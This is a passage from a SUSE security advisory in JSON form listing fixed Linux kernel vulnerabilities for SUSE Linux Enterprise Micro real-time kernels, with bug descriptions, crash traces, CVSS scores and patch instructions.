"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-21760",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21760"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nndisc: extend RCU protection in ndisc_send_skb()\n\nndisc_send_skb() can be called without RTNL or RCU held.\n\nAcquire rcu_read_lock() earlier, so that we can use dev_net_rcu()\nand avoid a potential UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21760",
"url": "https://www.suse.com/security/cve/CVE-2025-21760"
},
{
"category": "external",
"summary": "SUSE Bug 1238763 for CVE-2025-21760",
"url": "https://bugzilla.suse.com/1238763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-21760"
},
{
"cve": "CVE-2025-21764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nndisc: use RCU protection in ndisc_alloc_skb()\n\nndisc_alloc_skb() can be called without RTNL or RCU being held.\n\nAdd RCU protection to avoid possible UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21764",
"url": "https://www.suse.com/security/cve/CVE-2025-21764"
},
{
"category": "external",
"summary": "SUSE Bug 1237885 for CVE-2025-21764",
"url": "https://bugzilla.suse.com/1237885"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-21764"
},
{
"cve": "CVE-2025-21765",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21765"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: use RCU protection in ip6_default_advmss()\n\nip6_default_advmss() needs rcu protection to make\nsure the net structure it reads does not disappear.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21765",
"url": "https://www.suse.com/security/cve/CVE-2025-21765"
},
{
"category": "external",
"summary": "SUSE Bug 1237906 for CVE-2025-21765",
"url": "https://bugzilla.suse.com/1237906"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-21765"
},
{
"cve": "CVE-2025-21766",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21766"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: use RCU protection in __ip_rt_update_pmtu()\n\n__ip_rt_update_pmtu() must use RCU protection to make\nsure the net structure it reads does not disappear.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21766",
"url": "https://www.suse.com/security/cve/CVE-2025-21766"
},
{
"category": "external",
"summary": "SUSE Bug 1238754 for CVE-2025-21766",
"url": "https://bugzilla.suse.com/1238754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-21766"
},
{
"cve": "CVE-2025-38563",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38563"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/core: Prevent VMA split of buffer mappings\n\nThe perf mmap code is careful about mmap()\u0027ing the user page with the\nringbuffer and additionally the auxiliary buffer, when the event supports\nit. Once the first mapping is established, subsequent mapping have to use\nthe same offset and the same size in both cases. The reference counting for\nthe ringbuffer and the auxiliary buffer depends on this being correct.\n\nThough perf does not prevent that a related mapping is split via mmap(2),\nmunmap(2) or mremap(2). A split of a VMA results in perf_mmap_open() calls,\nwhich take reference counts, but then the subsequent perf_mmap_close()\ncalls are not longer fulfilling the offset and size checks. This leads to\nreference count leaks.\n\nAs perf already has the requirement for subsequent mappings to match the\ninitial mapping, the obvious consequence is that VMA splits, caused by\nresizing of a mapping or partial unmapping, have to be prevented.\n\nImplement the vm_operations_struct::may_split() callback and return\nunconditionally -EINVAL.\n\nThat ensures that the mapping offsets and sizes cannot be changed after the\nfact. Remapping to a different fixed address with the same size is still\npossible as it takes the references for the new mapping and drops those of\nthe old mapping.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38563",
"url": "https://www.suse.com/security/cve/CVE-2025-38563"
},
{
"category": "external",
"summary": "SUSE Bug 1248306 for CVE-2025-38563",
"url": "https://bugzilla.suse.com/1248306"
},
{
"category": "external",
"summary": "SUSE Bug 1248307 for CVE-2025-38563",
"url": "https://bugzilla.suse.com/1248307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-38563"
},
{
"cve": "CVE-2025-38565",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38565"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/core: Exit early on perf_mmap() fail\n\nWhen perf_mmap() fails to allocate a buffer, it still invokes the\nevent_mapped() callback of the related event. On X86 this might increase\nthe perf_rdpmc_allowed reference counter. But nothing undoes this as\nperf_mmap_close() is never called in this case, which causes another\nreference count leak.\n\nReturn early on failure to prevent that.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38565",
"url": "https://www.suse.com/security/cve/CVE-2025-38565"
},
{
"category": "external",
"summary": "SUSE Bug 1248377 for CVE-2025-38565",
"url": "https://bugzilla.suse.com/1248377"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "low"
}
],
"title": "CVE-2025-38565"
},
{
"cve": "CVE-2025-38684",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38684"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: use old \u0027nbands\u0027 while purging unused classes\n\nShuang reported sch_ets test-case [1] crashing in ets_class_qlen_notify()\nafter recent changes from Lion [2]. The problem is: in ets_qdisc_change()\nwe purge unused DWRR queues; the value of \u0027q-\u003enbands\u0027 is the new one, and\nthe cleanup should be done with the old one. The problem is here since my\nfirst attempts to fix ets_qdisc_change(), but it surfaced again after the\nrecent qdisc len accounting fixes. Fix it purging idle DWRR queues before\nassigning a new value of \u0027q-\u003enbands\u0027, so that all purge operations find a\nconsistent configuration:\n\n - old \u0027q-\u003enbands\u0027 because it\u0027s needed by ets_class_find()\n - old \u0027q-\u003enstrict\u0027 because it\u0027s needed by ets_class_is_strict()\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 62 UID: 0 PID: 39457 Comm: tc Kdump: loaded Not tainted 6.12.0-116.el10.x86_64 #1 PREEMPT(voluntary)\n Hardware name: Dell Inc. PowerEdge R640/06DKY5, BIOS 2.12.2 07/09/2021\n RIP: 0010:__list_del_entry_valid_or_report+0x4/0x80\n Code: ff 4c 39 c7 0f 84 39 19 8e ff b8 01 00 00 00 c3 cc cc cc cc 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa \u003c48\u003e 8b 17 48 8b 4f 08 48 85 d2 0f 84 56 19 8e ff 48 85 c9 0f 84 ab\n RSP: 0018:ffffba186009f400 EFLAGS: 00010202\n RAX: 00000000000000d6 RBX: 0000000000000000 RCX: 0000000000000004\n RDX: ffff9f0fa29b69c0 RSI: 0000000000000000 RDI: 0000000000000000\n RBP: ffffffffc12c2400 R08: 0000000000000008 R09: 0000000000000004\n R10: ffffffffffffffff R11: 0000000000000004 R12: 0000000000000000\n R13: ffff9f0f8cfe0000 R14: 0000000000100005 R15: 0000000000000000\n FS: 00007f2154f37480(0000) GS:ffff9f269c1c0000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000001530be001 CR4: 00000000007726f0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n ets_class_qlen_notify+0x65/0x90 [sch_ets]\n qdisc_tree_reduce_backlog+0x74/0x110\n ets_qdisc_change+0x630/0xa40 [sch_ets]\n __tc_modify_qdisc.constprop.0+0x216/0x7f0\n tc_modify_qdisc+0x7c/0x120\n rtnetlink_rcv_msg+0x145/0x3f0\n netlink_rcv_skb+0x53/0x100\n netlink_unicast+0x245/0x390\n netlink_sendmsg+0x21b/0x470\n ____sys_sendmsg+0x39d/0x3d0\n ___sys_sendmsg+0x9a/0xe0\n __sys_sendmsg+0x7a/0xd0\n do_syscall_64+0x7d/0x160\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n RIP: 0033:0x7f2155114084\n Code: 89 02 b8 ff ff ff ff eb bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 80 3d 25 f0 0c 00 00 74 13 b8 2e 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 54 c3 0f 1f 00 48 83 ec 28 89 54 24 1c 48 89\n RSP: 002b:00007fff1fd7a988 EFLAGS: 00000202 ORIG_RAX: 000000000000002e\n RAX: ffffffffffffffda RBX: 0000560ec063e5e0 RCX: 00007f2155114084\n RDX: 0000000000000000 RSI: 00007fff1fd7a9f0 RDI: 0000000000000003\n RBP: 00007fff1fd7aa60 R08: 0000000000000010 R09: 000000000000003f\n R10: 0000560ee9b3a010 R11: 0000000000000202 R12: 00007fff1fd7aae0\n R13: 000000006891ccde R14: 0000560ec063e5e0 R15: 00007fff1fd7aad0\n \u003c/TASK\u003e\n\n [1] https://lore.kernel.org/netdev/e08c7f4a6882f260011909a868311c6e9b54f3e4.1639153474.git.dcaratti@redhat.com/\n [2] https://lore.kernel.org/netdev/d912cbd7-193b-4269-9857-525bee8bbb6a@gmail.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38684",
"url": "https://www.suse.com/security/cve/CVE-2025-38684"
},
{
"category": "external",
"summary": "SUSE Bug 1249156 for CVE-2025-38684",
"url": "https://bugzilla.suse.com/1249156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-38684"
},
{
"cve": "CVE-2025-40044",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40044"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs: udf: fix OOB read in lengthAllocDescs handling\n\nWhen parsing Allocation Extent Descriptor, lengthAllocDescs comes from\non-disk data and must be validated against the block size. Crafted or\ncorrupted images may set lengthAllocDescs so that the total descriptor\nlength (sizeof(allocExtDesc) + lengthAllocDescs) exceeds the buffer,\nleading udf_update_tag() to call crc_itu_t() on out-of-bounds memory and\ntrigger a KASAN use-after-free read.\n\nBUG: KASAN: use-after-free in crc_itu_t+0x1d5/0x2b0 lib/crc-itu-t.c:60\nRead of size 1 at addr ffff888041e7d000 by task syz-executor317/5309\n\nCPU: 0 UID: 0 PID: 5309 Comm: syz-executor317 Not tainted 6.12.0-rc4-syzkaller-00261-g850925a8133c #0\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0x169/0x550 mm/kasan/report.c:488\n kasan_report+0x143/0x180 mm/kasan/report.c:601\n crc_itu_t+0x1d5/0x2b0 lib/crc-itu-t.c:60\n udf_update_tag+0x70/0x6a0 fs/udf/misc.c:261\n udf_write_aext+0x4d8/0x7b0 fs/udf/inode.c:2179\n extent_trunc+0x2f7/0x4a0 fs/udf/truncate.c:46\n udf_truncate_tail_extent+0x527/0x7e0 fs/udf/truncate.c:106\n udf_release_file+0xc1/0x120 fs/udf/file.c:185\n __fput+0x23f/0x880 fs/file_table.c:431\n task_work_run+0x24f/0x310 kernel/task_work.c:239\n exit_task_work include/linux/task_work.h:43 [inline]\n do_exit+0xa2f/0x28e0 kernel/exit.c:939\n do_group_exit+0x207/0x2c0 kernel/exit.c:1088\n __do_sys_exit_group kernel/exit.c:1099 [inline]\n __se_sys_exit_group kernel/exit.c:1097 [inline]\n __x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1097\n x64_sys_call+0x2634/0x2640 arch/x86/include/generated/asm/syscalls_64.h:232\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n \u003c/TASK\u003e\n\nValidate the computed total length against epos-\u003ebh-\u003eb_size.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40044",
"url": "https://www.suse.com/security/cve/CVE-2025-40044"
},
{
"category": "external",
"summary": "SUSE Bug 1252785 for CVE-2025-40044",
"url": "https://bugzilla.suse.com/1252785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-40044"
},
{
"cve": "CVE-2025-40139",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40139"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Use __sk_dst_get() and dst_dev_rcu() in in smc_clc_prfx_set().\n\nsmc_clc_prfx_set() is called during connect() and not under RCU\nnor RTNL.\n\nUsing sk_dst_get(sk)-\u003edev could trigger UAF.\n\nLet\u0027s use __sk_dst_get() and dev_dst_rcu() under rcu_read_lock()\nafter kernel_getsockname().\n\nNote that the returned value of smc_clc_prfx_set() is not used\nin the caller.\n\nWhile at it, we change the 1st arg of smc_clc_prfx_set[46]_rcu()\nnot to touch dst there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40139",
"url": "https://www.suse.com/security/cve/CVE-2025-40139"
},
{
"category": "external",
"summary": "SUSE Bug 1253409 for CVE-2025-40139",
"url": "https://bugzilla.suse.com/1253409"
},
{
"category": "external",
"summary": "SUSE Bug 1253411 for CVE-2025-40139",
"url": "https://bugzilla.suse.com/1253411"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
